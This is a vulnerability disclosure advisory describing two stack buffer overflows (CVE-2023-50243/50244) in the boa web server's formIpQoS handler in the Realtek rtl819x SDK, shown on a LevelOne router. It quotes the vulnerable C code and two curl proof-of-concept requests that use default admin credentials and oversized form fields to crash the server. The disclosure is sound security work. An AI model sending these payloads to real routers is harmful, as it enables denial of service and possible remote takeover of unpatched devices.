CVE-2023-50243,CVE-2023-50244
Two stack-based buffer overflow vulnerabilities exist in the boa formIpQoS functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11
rtl819x Jungle SDK - https://www.realtek.com/en/ WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-121 - Stack-based Buffer Overflow
The rtl819x Jungle SDK is an SDK for routers. This SDK uses as web server boa.
These Realtek rtl819x Jungle SDK vulnerabilities were found while researching the Levelone WBR-6013 router. We are going to explain these vulnerabilities from the perspective of the WBR-6013 router.
The WBR-6013 router has a web server called boa. The version used in the device is that of a Realtek SDK that uses boa. One of the SDK’s API is /boafrm/formRadvd. This API allows modifications of quality of service settings. The function responsible for this API is boa’s formIpQoS:
void formIpQoS(request *wp, char *path, char *query)
{
[...]
IPQOS_T entry, entry_tmp;
[...]
strAdd = req_get_cstream_var(wp, ("addQos"), "");
[...]
if (strAdd[0]) {
strVal = req_get_cstream_var(wp, ("enabled"), "");
if ( !strcmp(strVal, "ON")){
intVal = 1;
}
[...]
strBandwidth = req_get_cstream_var(wp, ("bandwidth"), "");
[...]
[1] strComment = req_get_cstream_var(wp, ("comment"), "");
[...]
if(no_rule_flag==0)
{
if ( strComment[0] ) {
[2] strcpy((char *)entry.entry_name, strComment);
}
[...]
[3] strName = req_get_cstream_var(wp, ("entry_name"), "");
if(strName[0])
{
apmib_get(MIB_QOS_RULE_TBL_NUM, (void *)&entryNum);
for(j=1;j<=entryNum;j++)
{
*((char *)&entry_tmp) = (char)j;
if ( apmib_get(MIB_QOS_RULE_TBL, (void *)&entry_tmp))
{
if((strlen(strName) == strlen(entry_tmp.entry_name)) && (memcmp(strName,entry_tmp.entry_name,strlen(strName))==0))
{
strcpy(tmpBuf, (" entry name conflict!"));
goto setErr;
}
}
}
[4] strcpy(entry.entry_name,strName);
}
}
[...]
}
[...]
}
The function will fetch the addQos and enabled request’s parameters. These parameters have to be set and enabled. Specifically, they have to have the On value to reach the portions of code we are going to focus on. Furthermore, the bandwidth request’s parameter has to be set to a value different than zero. If the previous requirements are met, eventually, the code at [1] is reached.
At [1] the comment request’s parameter is fetched and copied at [2] into the entry_name struct member of the entry stack variable.
Eventually the code at [3] is also reached and the entry_name request’s parameters is fetched. This value is copied at [4], if different than any other entry names already registered, into the entry_name struct member of the entry stack variable.
Both copies lead to an issue that we describe separately below.
Because no checks are performed on the size of the comment request’s parameter string, a buffer overflow can occur at [2] in the stack variable entry. An attacker could exploit this vulnerability to achieve arbitrary code execution.
To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/ip6_qos.htm &>/dev/null
After this request it is possible to use the /boafrm/formIpQoS API:
curl -d "addQos=1&enabled=ON&bandwidth=1&comment=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formIpQoS
After the request the boa process will crash. The POC uses the default admin credentials.
Because no checks are performed on the size of the entry_name request’s parameter string, a buffer overflow can occur at [4] in the stack variable entry. An attacker could exploit this vulnerability to achieve arbitrary code execution.
To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/ip6_qos.htm &>/dev/null
After this request it is possible to use the /boafrm/formIpQoS API:
curl -d "addQos=1&enabled=ON&bandwidth=1&entry_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formIpQoS
After the request the boa process will crash. The POC uses the default admin credentials.
Realtek has provided updates software to their customers. LevelOne has declined to patch the issues in their software.
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.